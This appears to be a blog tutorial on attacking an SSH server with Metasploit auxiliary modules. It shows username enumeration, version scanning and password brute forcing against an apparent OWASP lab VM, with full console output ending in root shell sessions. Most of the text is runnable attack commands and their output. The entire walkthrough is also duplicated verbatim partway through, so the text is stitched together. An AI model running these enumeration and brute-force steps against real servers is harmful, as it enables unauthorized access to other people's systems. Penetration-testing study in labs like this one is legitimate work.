Hacking SSH with Metasploit Auxiliary Modules
Perhaps SSH is another popular services targeted by hackers. So in this post going to show you how to use metasploit modules to dictionary or brute force attack to hack SSH server.
Firstly we need to find the correct users to make the password guessing attack. We can enumerate username with metasploit auxiliary/scanner/ssh/ssh_enumusers module:
msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
THRESHOLD 10 yes Amount of seconds needed before a user is considered found
USER_FILE yes File containing usernames, one per line
msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run
[*] 192.168.67.136:22 - SSH - Checking for false positives
[*] 192.168.67.136:22 - SSH - Starting scan
[+] 192.168.67.136:22 - SSH - User 'root' found
[!] 192.168.67.136:22 - SSH - User 'owaspbroken' not found
[!] 192.168.67.136:22 - SSH - User 'broken' not found
[!] 192.168.67.136:22 - SSH - User 'mag' not found
[!] 192.168.67.136:22 - SSH - User 'admin' not found
[!] 192.168.67.136:22 - SSH - User 'Administrator' not found
[!] 192.168.67.136:22 - SSH - User 'owaspbwa' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >
The username 'root' is found . Let's do something else.... thinking... thinking!
Let's find out the version of the SSH for future reference to find exploits:
msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run
[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Well, Now lets guess the password. Always try to have good list of password otherwise it will waste of time. SSH is slow to guess password. Anyway, Here is how we can hack the ssh server:
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'Administrator:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbwa:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:root'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:root'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'broken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'broken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:root'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:broken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:mag'
[-] 192.168.67.136:22 SSH - Failed: 'mag:admin'
[-] 192.168.67.136:22 SSH - Failed: 'mag:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:root'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:broken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:mag'
[-] 192.168.67.136:22 SSH - Failed: 'admin:admin'
[-] 192.168.67.136:22 SSH - Failed: 'admin:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
Let me know if you have questions!
Firstly we need to find the correct users to make the password guessing attack. We can enumerate username with metasploit auxiliary/scanner/ssh/ssh_enumusers module:
msf auxiliary(dns_srv_enum) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(ssh_enumusers) > show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
THRESHOLD 10 yes Amount of seconds needed before a user is considered found
USER_FILE yes File containing usernames, one per line
msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_enumusers) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
msf auxiliary(ssh_enumusers) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_enumusers) > run
[*] 192.168.67.136:22 - SSH - Checking for false positives
[*] 192.168.67.136:22 - SSH - Starting scan
[+] 192.168.67.136:22 - SSH - User 'root' found
[!] 192.168.67.136:22 - SSH - User 'owaspbroken' not found
[!] 192.168.67.136:22 - SSH - User 'broken' not found
[!] 192.168.67.136:22 - SSH - User 'mag' not found
[!] 192.168.67.136:22 - SSH - User 'admin' not found
[!] 192.168.67.136:22 - SSH - User 'Administrator' not found
[!] 192.168.67.136:22 - SSH - User 'owaspbwa' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_enumusers) >
The username 'root' is found . Let's do something else.... thinking... thinking!
Let's find out the version of the SSH for future reference to find exploits:
msf auxiliary(ssh_enumusers) > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_version) > run
[*] 192.168.67.136:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Well, Now lets guess the password. Always try to have good list of password otherwise it will waste of time. SSH is slow to guess password. Anyway, Here is how we can hack the ssh server:
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set USER_FILE /root/Desktop/users
USER_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > set USERASS_FILE true
USERASS_FILE => true
msf auxiliary(ssh_login) > set RHOSTS 192.168.67.136
RHOSTS => 192.168.67.136
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set PASSWORD owaspbwa
PASSWORD => owaspbwa
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.67.139:44027 -> 192.168.67.136:22) at 2014-12-17 04:23:57 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'Administrator:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbwa:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/users
PASS_FILE => /root/Desktop/users
msf auxiliary(ssh_login) > run
[*] 192.168.67.136:22 SSH - Starting bruteforce
[+] 192.168.67.136:22 SSH - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.67.139:43450 -> 192.168.67.136:22) at 2014-12-17 04:25:06 -0500
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:root'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'owaspbroken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'broken:root'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:broken'
[-] 192.168.67.136:22 SSH - Failed: 'broken:mag'
[-] 192.168.67.136:22 SSH - Failed: 'broken:admin'
[-] 192.168.67.136:22 SSH - Failed: 'broken:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'broken:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'mag:root'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:broken'
[-] 192.168.67.136:22 SSH - Failed: 'mag:mag'
[-] 192.168.67.136:22 SSH - Failed: 'mag:admin'
[-] 192.168.67.136:22 SSH - Failed: 'mag:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'mag:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[-] 192.168.67.136:22 SSH - Failed: 'admin:root'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbroken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:broken'
[-] 192.168.67.136:22 SSH - Failed: 'admin:mag'
[-] 192.168.67.136:22 SSH - Failed: 'admin:admin'
[-] 192.168.67.136:22 SSH - Failed: 'admin:Administrator'
[-] 192.168.67.136:22 SSH - Failed: 'admin:owaspbwa'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
Let me know if you have questions!